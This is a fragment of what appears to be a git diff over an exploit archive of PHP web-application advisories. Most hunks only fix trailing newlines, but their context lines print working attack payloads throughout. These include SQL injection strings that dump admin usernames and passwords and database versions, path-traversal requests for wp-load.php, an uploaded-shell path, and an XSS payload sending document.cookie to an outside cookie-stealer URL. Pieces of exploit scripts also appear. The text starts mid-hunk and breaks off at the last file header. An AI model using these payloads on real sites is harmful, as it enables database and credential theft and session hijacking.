+/*!50000union*/+select+@@version-- - -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41483.html b/platforms/php/webapps/41483.html index c4fa6b41b..ae49f7c18 100755 --- a/platforms/php/webapps/41483.html +++ b/platforms/php/webapps/41483.html @@ -50,4 +50,4 @@ Proof of concept: - + \ No newline at end of file diff --git a/platforms/php/webapps/41484.txt b/platforms/php/webapps/41484.txt index 86199a0de..a3946e20a 100755 --- a/platforms/php/webapps/41484.txt +++ b/platforms/php/webapps/41484.txt @@ -50,4 +50,4 @@ Cookie: wordpress_test_cookie=WP+Cookie+check Connection: close Content-Type: application/x-www-form-urlencoded -log=&pwd=&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1 +log=&pwd=&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1 \ No newline at end of file diff --git a/platforms/php/webapps/41485.html b/platforms/php/webapps/41485.html index 4ba054f51..f2a2e1bd9 100755 --- a/platforms/php/webapps/41485.html +++ b/platforms/php/webapps/41485.html @@ -148,4 +148,4 @@ This issue exists because Popup by Supsystic lacks protection against Cross-Site - + \ No newline at end of file diff --git a/platforms/php/webapps/41486.txt b/platforms/php/webapps/41486.txt index adf03b27a..c32d50193 100755 --- a/platforms/php/webapps/41486.txt +++ b/platforms/php/webapps/41486.txt @@ -45,4 +45,4 @@ Based on the above request, the vulnerable output will be: 2) Arrived from javascript:document.location=`http://www.sfylabs.nl/demo/xss/cookiestealer.php?c=`+encodeURIComponent(document.cookie); http://yourhost/wp-admin/admin.php?page=nsp_main -http://yourhost/wp-admin/admin.php?page=nsp_visits +http://yourhost/wp-admin/admin.php?page=nsp_visits \ No newline at end of file diff --git a/platforms/php/webapps/41487.html b/platforms/php/webapps/41487.html index 46268170a..2765f6ceb 100755 --- a/platforms/php/webapps/41487.html +++ b/platforms/php/webapps/41487.html @@ -43,4 +43,4 @@ The following proof of concept will update/overwrite the content block with id 1 - + \ No newline at end of file diff --git a/platforms/php/webapps/41488.html b/platforms/php/webapps/41488.html index 472dcdeac..90e1d230e 100755 --- a/platforms/php/webapps/41488.html +++ b/platforms/php/webapps/41488.html @@ -65,4 +65,4 @@ Content-Type: text/php ------------------------------6427194103423794601262893907-- +-----------------------------6427194103423794601262893907-- \ No newline at end of file diff --git a/platforms/php/webapps/41490.txt b/platforms/php/webapps/41490.txt index 0cc1fe5cd..50c90b6b9 100755 --- a/platforms/php/webapps/41490.txt +++ b/platforms/php/webapps/41490.txt @@ -18,4 +18,4 @@ # http://localhost/[PATH]/create.php?create=[SQL] -1'+/*!50000union*/+Select+(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),2,3,4,5,6,7,8,9-- - # Etc... -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41491.txt b/platforms/php/webapps/41491.txt index e265816e6..d83c95b09 100755 --- a/platforms/php/webapps/41491.txt +++ b/platforms/php/webapps/41491.txt @@ -16,4 +16,4 @@ # http://localhost/[PATH]/profil.php?user=[SQL] # -2'+/*!50000union*/+select+1,2,3,4,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),6,7-- - # Etc... -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41494.txt b/platforms/php/webapps/41494.txt index 119699f85..e41262e6a 100755 --- a/platforms/php/webapps/41494.txt +++ b/platforms/php/webapps/41494.txt @@ -15,4 +15,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]/index.php?option=com_streetguess&view=leaderboard&id=[SQL] # 7'+/*!50000Procedure*/+/*!50000Analyse*/+(/*!50000extractvalue*/(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,/*!50000@@version*/)),0)-- - -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41495.txt b/platforms/php/webapps/41495.txt index 11e9a7862..d526da320 100755 --- a/platforms/php/webapps/41495.txt +++ b/platforms/php/webapps/41495.txt @@ -15,4 +15,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]/guessers?type=[SQL] # 'and(select+1+from+(select+count(*),concat((select(select+concat(cast(database()+as+char),0x3c3c3c,0x7e,0x496873616e2053656e63616e))+from information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables group+by+x)a)+AND+'Ihsan'='Sencan -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41496.txt b/platforms/php/webapps/41496.txt index 15ebf39ae..8586dfcdf 100755 --- a/platforms/php/webapps/41496.txt +++ b/platforms/php/webapps/41496.txt @@ -15,5 +15,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]/index.php?option=com_recipe&view=recipes&task=print_ingred&id=[SQL] # 10'+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- - -# # # # # - +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4150.txt b/platforms/php/webapps/4150.txt index 2aa334669..2fe66c8cf 100755 --- a/platforms/php/webapps/4150.txt +++ b/platforms/php/webapps/4150.txt @@ -12,4 +12,4 @@ Example: 3. /VRNews/admin.php?act=config 4. /VRNews/admin.php?act=del -# milw0rm.com [2007-07-05] +# milw0rm.com [2007-07-05] \ No newline at end of file diff --git a/platforms/php/webapps/41504.txt b/platforms/php/webapps/41504.txt index c7f910dc2..c69ed2ec2 100755 --- a/platforms/php/webapps/41504.txt +++ b/platforms/php/webapps/41504.txt @@ -15,4 +15,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]/index.php?option=com_jux_eventon&view=event&id=[SQL] # 3+union+select+1,@@version,3,4,5,6 -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41505.txt b/platforms/php/webapps/41505.txt index 276cdaea6..638872fcc 100755 --- a/platforms/php/webapps/41505.txt +++ b/platforms/php/webapps/41505.txt @@ -15,4 +15,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]/index.php?option=com_monthlyarchive&view=monthlyarchive&month_year_form=07-2017&order=0&author_form=[SQL] # 1+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e,0x496873616e53656e63616e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a) -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41508.txt b/platforms/php/webapps/41508.txt index c55d94a84..273496116 100755 --- a/platforms/php/webapps/41508.txt +++ b/platforms/php/webapps/41508.txt @@ -16,4 +16,4 @@ # Login as regular user # http://localhost/[PATH]/index.php?option=com_altauserpoints&view=account&userid=[SQL] # 1'+/*!50000OR*/+1+/*!50000GROUP*/+BY+/*!50000CONCAT_WS*/(0x3a,0x496873616e53656e63616e,DATABASE(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1-- - -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4151.sh b/platforms/php/webapps/4151.sh index 1ed8c1ab3..e68bf4519 100755 --- a/platforms/php/webapps/4151.sh +++ b/platforms/php/webapps/4151.sh @@ -56,4 +56,4 @@ echo You can login with the username \'trixbox\' and password \'trixbox\' ## End Exploit ## -# milw0rm.com [2007-07-05] +# milw0rm.com [2007-07-05] \ No newline at end of file diff --git a/platforms/php/webapps/41513.txt b/platforms/php/webapps/41513.txt index 6a2346021..c7c181122 100755 --- a/platforms/php/webapps/41513.txt +++ b/platforms/php/webapps/41513.txt @@ -14,5 +14,4 @@ # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/available_seat.php?hid_Busid=[SQL] -# # # # # - +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41517.txt b/platforms/php/webapps/41517.txt index ddd3f2c28..5af24d661 100755 --- a/platforms/php/webapps/41517.txt +++ b/platforms/php/webapps/41517.txt @@ -14,4 +14,4 @@ # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/available_seat.php?hid_Busid=[SQL] -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41518.txt b/platforms/php/webapps/41518.txt index dd2e36909..a3acbfdad 100755 --- a/platforms/php/webapps/41518.txt +++ b/platforms/php/webapps/41518.txt @@ -22,4 +22,4 @@ # admin :address # admin :mobile # -40+/*!50000union*/+select+1,2,3,4,5,/*!50000concat*/(user,0x3a,pass),7,8,9,10,11,12,13,14,15,16,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,18,19,20,21,22+from+admin-- - -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41520.txt b/platforms/php/webapps/41520.txt index b7e27e5e0..79b7174bd 100755 --- a/platforms/php/webapps/41520.txt +++ b/platforms/php/webapps/41520.txt @@ -18,5 +18,4 @@ # http://localhost/[PATH]/blog.php?blogid=[SQL] # -2'+/*!50000union*/+select+1,@@version,3,4,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,6,7,8,9,10,11,12-- - # Etc... -# # # # # - +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41522.txt b/platforms/php/webapps/41522.txt index 586ded134..71c1dfede 100755 --- a/platforms/php/webapps/41522.txt +++ b/platforms/php/webapps/41522.txt @@ -21,4 +21,4 @@ # -1'+/*!50000union*/+select+1,2,3,4,5,@@version,7,8,9-- - # -1'+/*!50000union*/+select+1,2,3,4,5,6,@@version,8-- - # Etc... Etc... -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41526.txt b/platforms/php/webapps/41526.txt index 2d93e2e46..66c41f8ef 100755 --- a/platforms/php/webapps/41526.txt +++ b/platforms/php/webapps/41526.txt @@ -22,4 +22,4 @@ # mlm_admin :admin_status # -1'+/*!50000union*/+select+1,2,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,/*!50000concat*/(admin_username,0x3a,admin_password),5,6,7,8+from+mlm_admin--+- # Etc... -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4153.txt b/platforms/php/webapps/4153.txt index 7d44e5456..92d1fe6ec 100755 --- a/platforms/php/webapps/4153.txt +++ b/platforms/php/webapps/4153.txt @@ -30,4 +30,4 @@ GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net ! --==+ phpVID SQL Injection Vulnerbilitys +==-- --==+================================================================================+==-- -# milw0rm.com [2007-07-06] +# milw0rm.com [2007-07-06] \ No newline at end of file diff --git a/platforms/php/webapps/41530.txt b/platforms/php/webapps/41530.txt index 0973b96b7..08d2454cf 100755 --- a/platforms/php/webapps/41530.txt +++ b/platforms/php/webapps/41530.txt @@ -14,4 +14,4 @@ # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/search-smart-result.php?cityse=Smart+Search&gender=Male&subcaste=[SQL]&diet=[SQL]&smoke=[SQL]&drink=[SQL]&body_type=[SQL]&familyvalue=[SQL]&familystatus=[SQL]&asubmit=SEARCH -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41531.txt b/platforms/php/webapps/41531.txt index d16bcbaeb..8ecad5b8e 100755 --- a/platforms/php/webapps/41531.txt +++ b/platforms/php/webapps/41531.txt @@ -23,6 +23,4 @@ # admin :email # -1'+/*!50000union*/+select+1,2,3,4,5,6,/*!50000ConCat(*/username,/*!50000char*/(58),adminpassword),8,9,10,11,12,13,14,15,16,17,18,19,20,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,22,23+/*!50000from*/+admin--+- # Etc... -# # # # # - - +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41534.txt b/platforms/php/webapps/41534.txt index 0154ca9d1..b45c1a852 100755 --- a/platforms/php/webapps/41534.txt +++ b/platforms/php/webapps/41534.txt @@ -23,4 +23,4 @@ # admin :CreatedDate # -14'+/*!50000union*/+select+1,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,3,4,5,6,7,8,9,10,11,12,/*!50000ConCat(*/AdminName,/*!50000char*/(58),AdminPass),14,15+from+admin--+- # Etc... -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41535.txt b/platforms/php/webapps/41535.txt index 8462da4b1..15a6c25be 100755 --- a/platforms/php/webapps/41535.txt +++ b/platforms/php/webapps/41535.txt @@ -18,4 +18,4 @@ # http://localhost/[PATH]/searchcourse.php?categoryid=[SQL] # http://localhost/[PATH]/collegedetails.php?id=[SQL] # Etc... -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41539.txt b/platforms/php/webapps/41539.txt index e131743c4..12ebeefd3 100755 --- a/platforms/php/webapps/41539.txt +++ b/platforms/php/webapps/41539.txt @@ -24,4 +24,4 @@ # admin_users :password # -224'+/*!50000union*/+select+1,2,3,4,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,/*!50000ConCat(*/userid,/*!50000char*/(58),password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+admin_login--+- # Etc... -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4154.txt b/platforms/php/webapps/4154.txt index 71d24f1b4..f9eaab893 100755 --- a/platforms/php/webapps/4154.txt +++ b/platforms/php/webapps/4154.txt @@ -36,4 +36,4 @@ GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net ! --==+ eMeeting Online Dating Software 5.2 SQL Injection Vulnerbilitys +==-- --==+================================================================================+==-- -# milw0rm.com [2007-07-06] +# milw0rm.com [2007-07-06] \ No newline at end of file diff --git a/platforms/php/webapps/41540.py b/platforms/php/webapps/41540.py index a32cc0527..9288151c6 100755 --- a/platforms/php/webapps/41540.py +++ b/platforms/php/webapps/41540.py @@ -55,4 +55,4 @@ def exploit(): quit() if __name__ == "__main__": - checkExistence() + checkExistence() \ No newline at end of file diff --git a/platforms/php/webapps/41544.txt b/platforms/php/webapps/41544.txt index 6baa5030c..b4153a46b 100755 --- a/platforms/php/webapps/41544.txt +++ b/platforms/php/webapps/41544.txt @@ -14,4 +14,4 @@ # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/deal.php?id=[SQL] -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41549.txt b/platforms/php/webapps/41549.txt index 2f1f765ba..14e6561a3 100755 --- a/platforms/php/webapps/41549.txt +++ b/platforms/php/webapps/41549.txt @@ -14,5 +14,4 @@ # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/LastAdded/?by=[SQL] -# # # # # - +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41551.txt b/platforms/php/webapps/41551.txt index 729a145b2..6d143e500 100755 --- a/platforms/php/webapps/41551.txt +++ b/platforms/php/webapps/41551.txt @@ -14,4 +14,4 @@ # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/LastAdded/?by=[SQL] -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41552.txt b/platforms/php/webapps/41552.txt index a1e2d4c38..00e9a93ac 100755 --- a/platforms/php/webapps/41552.txt +++ b/platforms/php/webapps/41552.txt @@ -14,4 +14,4 @@ # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/LastAdded/?by=[SQL] -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41553.txt b/platforms/php/webapps/41553.txt index b5f1d57cf..34cd46113 100755 --- a/platforms/php/webapps/41553.txt +++ b/platforms/php/webapps/41553.txt @@ -17,6 +17,4 @@ # http://localhost/[PATH]/graphics/graphics/?by=[SQL] # http://localhost/[PATH]/themes/word-press/?by=[SQL] # http://localhost/[PATH]/audios/music/?by=[SQL] -# # # # # - - +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4156.txt b/platforms/php/webapps/4156.txt index 6fed6f64a..a654f16ad 100755 --- a/platforms/php/webapps/4156.txt +++ b/platforms/php/webapps/4156.txt @@ -33,4 +33,4 @@ ## Thanks : str0ke -# milw0rm.com [2007-07-06] +# milw0rm.com [2007-07-06] \ No newline at end of file diff --git a/platforms/php/webapps/41561.txt b/platforms/php/webapps/41561.txt index 296fa7941..ddadcb075 100755 --- a/platforms/php/webapps/41561.txt +++ b/platforms/php/webapps/41561.txt @@ -22,4 +22,4 @@ # admin :role # admin :permissions # Etc.. -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41562.txt b/platforms/php/webapps/41562.txt index 8fb928d5e..6427a322f 100755 --- a/platforms/php/webapps/41562.txt +++ b/platforms/php/webapps/41562.txt @@ -15,4 +15,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]/search/?searchChar=Ihsan_Sencan&category=[SQL] # Etc.. -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41563.txt b/platforms/php/webapps/41563.txt index 029d0d033..fa3f0fe01 100755 --- a/platforms/php/webapps/41563.txt +++ b/platforms/php/webapps/41563.txt @@ -15,4 +15,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]/Search?by=p&q=&user=[SQL] # Etc.. -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41564.php b/platforms/php/webapps/41564.php index fb2dcfb19..187b3a706 100755 --- a/platforms/php/webapps/41564.php +++ b/platforms/php/webapps/41564.php @@ -313,7 +313,4 @@ function store($name, $data) $filename = "$name.json"; file_put_contents($filename, json_encode($data, JSON_PRETTY_PRINT)); x("Stored $name information in $filename"); -} - - - +} \ No newline at end of file diff --git a/platforms/php/webapps/41566.txt b/platforms/php/webapps/41566.txt index 8486fae68..9e0634bd1 100755 --- a/platforms/php/webapps/41566.txt +++ b/platforms/php/webapps/41566.txt @@ -15,4 +15,4 @@ # Exploit : # http://localhost/[PLUGIN_PATH]/macdownload.php?albid=../../../wp-load.php # Etc.. -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41568.txt b/platforms/php/webapps/41568.txt index f3e99a258..d793fe4c9 100755 --- a/platforms/php/webapps/41568.txt +++ b/platforms/php/webapps/41568.txt @@ -15,4 +15,4 @@ # SQL Injection/Exploit : # http://localhost/[PLUGIN_PATH]/asgallDownload.php?imgname=../../../wp-load.php # Etc.. -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41569.txt b/platforms/php/webapps/41569.txt index 81b07daac..be3ec87fa 100755 --- a/platforms/php/webapps/41569.txt +++ b/platforms/php/webapps/41569.txt @@ -18,4 +18,4 @@ # -3+/*!50000union*/+select+0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,2,3,@@version--+- # wpapptha_term_relationships,wpapptha_term_taxonomy,wpapptha_terms,wpapptha_usermeta,wpapptha_users # Etc.. -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41584.txt b/platforms/php/webapps/41584.txt index d626dc0c7..c762b5467 100755 --- a/platforms/php/webapps/41584.txt +++ b/platforms/php/webapps/41584.txt @@ -18,4 +18,4 @@ # Upload Photo / File.php # http://localhost/[PATH]/post-images/1113330455_File.php # Etc.. -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41589.txt b/platforms/php/webapps/41589.txt index fe6c4aa5e..f07a143af 100755 --- a/platforms/php/webapps/41589.txt +++ b/platforms/php/webapps/41589.txt @@ -15,4 +15,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]/front.php?controller=pjListings&action=pjActionIndex&listing_search=1&min_year=1948[SQL]&max_year=2017[SQL]&min_loa=6[SQL]&max_loa=20[SQL]&min_length=25[SQL]&max_length=150[SQL]&min_beam=20[SQL]&max_beam=150[SQL] # Etc.. -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4159.txt b/platforms/php/webapps/4159.txt index 6260fbfc2..fff7eef1b 100755 --- a/platforms/php/webapps/4159.txt +++ b/platforms/php/webapps/4159.txt @@ -27,4 +27,4 @@ Dork: "Powered by GameSiteScript" ############################################### -# milw0rm.com [2007-07-07] +# milw0rm.com [2007-07-07] \ No newline at end of file diff --git a/platforms/php/webapps/41590.txt b/platforms/php/webapps/41590.txt index d83c15cd5..d09376e46 100755 --- a/platforms/php/webapps/41590.txt +++ b/platforms/php/webapps/41590.txt @@ -15,4 +15,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]/preview.php?controller=pjListings&action=pjActionIndex&category_id=[SQL] # Etc.. -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41591.txt b/platforms/php/webapps/41591.txt index 1d628714c..ba27cc4b3 100755 --- a/platforms/php/webapps/41591.txt +++ b/platforms/php/webapps/41591.txt @@ -15,4 +15,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&column=[SQL]created&direction=DESC # Etc.. -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41594.txt b/platforms/php/webapps/41594.txt index feceef4e4..1b7b8aef9 100755 --- a/platforms/php/webapps/41594.txt +++ b/platforms/php/webapps/41594.txt @@ -70,7 +70,4 @@ IV. Thanks to: Refer: -https://www.owasp.org/index.php/Testing_for_Privilege_escalation_(OTG-AUTHZ-003) - - - +https://www.owasp.org/index.php/Testing_for_Privilege_escalation_(OTG-AUTHZ-003) \ No newline at end of file diff --git a/platforms/php/webapps/41599.txt b/platforms/php/webapps/41599.txt index 582141840..d20fa69b4 100755 --- a/platforms/php/webapps/41599.txt +++ b/platforms/php/webapps/41599.txt @@ -15,4 +15,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]/index.php?option=com_simplemembership&Itemid=1&task=showUsersProfile&userId=[SQL] # +/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,database())),0)--+- -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41600.txt b/platforms/php/webapps/41600.txt index 49ae79d62..0e2fc1500 100755 --- a/platforms/php/webapps/41600.txt +++ b/platforms/php/webapps/41600.txt @@ -15,4 +15,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]/index.php/153/show_alone_advertisement/7?task=show_alone_advertisement&id=[SQL] # +/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,database())),0)--+- -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41602.txt b/platforms/php/webapps/41602.txt index afa443391..0f880cb56 100755 --- a/platforms/php/webapps/41602.txt +++ b/platforms/php/webapps/41602.txt @@ -16,4 +16,4 @@ # http://localhost/[PATH]/index.php/en/our-staff?view=employeeslist&ordering=6&filters[group]=[SQL]&filters[service]=[SQL]&filters[country]=[SQL]&filters[state]=[SQL] # ext4joo_vikappointmentsj3demo # Etc.. -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41604.txt b/platforms/php/webapps/41604.txt index 29c9b41eb..a7f708b1f 100755 --- a/platforms/php/webapps/41604.txt +++ b/platforms/php/webapps/41604.txt @@ -16,4 +16,4 @@ # http://localhost/[PATH]/index.php/en/?option=com_vikrentcar&caropt=[SQL]&days=31&pickup=1490947200&release=1493542800&place=[SQL]&task=showprc&Itemid=104 # ext4joo_vikrentcarj3demo # Etc.. -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4161.txt b/platforms/php/webapps/4161.txt index 5d4277641..b4b5dd965 100755 --- a/platforms/php/webapps/4161.txt +++ b/platforms/php/webapps/4161.txt @@ -27,4 +27,4 @@ Dork: "Powered by FlashGameScript" ############################################### -# milw0rm.com [2007-07-08] +# milw0rm.com [2007-07-08] \ No newline at end of file diff --git a/platforms/php/webapps/4163.php b/platforms/php/webapps/4163.php index ea82ce1a2..d18d92e48 100755 --- a/platforms/php/webapps/4163.php +++ b/platforms/php/webapps/4163.php @@ -165,4 +165,4 @@ echo "[!] Changed password : 123456\r\n"; ?> -# milw0rm.com [2007-07-08] +# milw0rm.com [2007-07-08] \ No newline at end of file diff --git a/platforms/php/webapps/41634.txt b/platforms/php/webapps/41634.txt index 24e4ca52c..e7cf4ee1e 100755 --- a/platforms/php/webapps/41634.txt +++ b/platforms/php/webapps/41634.txt @@ -25,5 +25,4 @@ # pc_settings :PayPal # pc_settings :IpnMode # Etc.. -# # # # # - +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41636.txt b/platforms/php/webapps/41636.txt index e2cc6bc44..676b3a5fd 100755 --- a/platforms/php/webapps/41636.txt +++ b/platforms/php/webapps/41636.txt @@ -15,4 +15,4 @@ # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/download.php?dc=[SQL] -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4164.txt b/platforms/php/webapps/4164.txt index cdab630ce..355adfe26 100755 --- a/platforms/php/webapps/4164.txt +++ b/platforms/php/webapps/4164.txt @@ -13,4 +13,4 @@ EXPLOITS: http://www.website.com/index.php?page=topic&topic_id=9999/**/UNION/**/SELECT/**/ALL/**/null,null,CONCAT(login,CHAR(58),password),null/**/FROM/**/person/**/WHERE/**/ID=1-- http://www.website.com/index.php?page=topic&topic_id=9999/**/UNION/**/SELECT/**/ALL/**/null,null,password,null/**/FROM/**/person-- -# milw0rm.com [2007-07-09] +# milw0rm.com [2007-07-09] \ No newline at end of file diff --git a/platforms/php/webapps/41642.txt b/platforms/php/webapps/41642.txt index aa4c2560a..156c6edf9 100755 --- a/platforms/php/webapps/41642.txt +++ b/platforms/php/webapps/41642.txt @@ -15,4 +15,4 @@ # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/index.php?option=com_jcart&route=product/product&product_id=[SQL] -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4166.txt b/platforms/php/webapps/4166.txt index 3be6fbffe..c82e1945a 100755 --- a/platforms/php/webapps/4166.txt +++ b/platforms/php/webapps/4166.txt @@ -25,4 +25,4 @@ GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net ! --==+ RPG Inferno v2.4 SQL Injection Vulnerability +==-- --==+================================================================================+==-- -# milw0rm.com [2007-07-10] +# milw0rm.com [2007-07-10] \ No newline at end of file diff --git a/platforms/php/webapps/4167.txt b/platforms/php/webapps/4167.txt index 053e89d5a..d7132c746 100755 --- a/platforms/php/webapps/4167.txt +++ b/platforms/php/webapps/4167.txt @@ -21,4 +21,4 @@ EXPLOITS: http://www.website.com/index.php?id=999/**/UNION/**/SELECT/**/ALL/**/null,null,null,null,null,value,null,null,null,null,null,null,null,null/**/FROM/**/settings-- -# milw0rm.com [2007-07-10] +# milw0rm.com [2007-07-10] \ No newline at end of file diff --git a/platforms/php/webapps/41673.txt b/platforms/php/webapps/41673.txt index 7ad342801..1fd2c5abf 100755 --- a/platforms/php/webapps/41673.txt +++ b/platforms/php/webapps/41673.txt @@ -22,4 +22,4 @@ https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-re # L u Arg -############################################################################################### +############################################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/4169.txt b/platforms/php/webapps/4169.txt index ae2da7a87..7f8b519bd 100755 --- a/platforms/php/webapps/4169.txt +++ b/platforms/php/webapps/4169.txt @@ -58,4 +58,4 @@ else { $data=get($kw3); print $data ; } } -# milw0rm.com [2007-07-10] +# milw0rm.com [2007-07-10] \ No newline at end of file diff --git a/platforms/php/webapps/4171.pl b/platforms/php/webapps/4171.pl index cad081808..c11e43287 100755 --- a/platforms/php/webapps/4171.pl +++ b/platforms/php/webapps/4171.pl @@ -77,4 +77,4 @@ sub Usage() print "Do not forget edit host/path/port..\n"; } -# milw0rm.com [2007-07-10] +# milw0rm.com [2007-07-10] \ No newline at end of file diff --git a/platforms/php/webapps/41724.txt b/platforms/php/webapps/41724.txt index 79327bc35..7fb9fdc9f 100755 --- a/platforms/php/webapps/41724.txt +++ b/platforms/php/webapps/41724.txt @@ -17,5 +17,4 @@ # http://localhost/[PATH]/ajaxglobalfunc.php?func=addfav&vid_id=[SQL] # http://localhost/[PATH]/ajaxglobalfunc.php?func=flag&vid_id=[SQL] # http://localhost/[PATH]/ajaxplay.php?vidid=[SQL] -# # # # # - +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41726.txt b/platforms/php/webapps/41726.txt index 7462cae59..4d066fbbe 100755 --- a/platforms/php/webapps/41726.txt +++ b/platforms/php/webapps/41726.txt @@ -18,4 +18,4 @@ # http://localhost/[PATH]/ajax.php?section=count_tradeleade&cl_id=[SQL] # http://localhost/[PATH]/ajax.php?section=count_product&pro_id=[SQL] # Etc... -# # # # # +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41727.txt b/platforms/php/webapps/41727.txt index c88584f21..439390286 100755 --- a/platforms/php/webapps/41727.txt +++ b/platforms/php/webapps/41727.txt @@ -18,5 +18,4 @@ # http://localhost/[PATH]/ajax.php?section=count_tradeleade&cl_id=[SQL] # http://localhost/[PATH]/ajax.php?section=count_product&pro_id=[SQL] # Etc... -# # # # # - +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4173.txt b/platforms/php/webapps/4173.txt index 05e903a7c..a67346e1f 100755 --- a/platforms/php/webapps/4173.txt +++ b/platforms/php/webapps/4173.txt @@ -47,4 +47,4 @@ German ezine or are interested in exchanging informations, exploits... IRC: jmp-esp.kicks-ass.net / 6667 or 6661 (ssl) #main -# milw0rm.com [2007-07-11] +# milw0rm.com [2007-07-11] \ No newline at end of file diff --git a/platforms/php/webapps/41730.txt b/platforms/php/webapps/41730.txt index 29460001b..6e7440129 100755 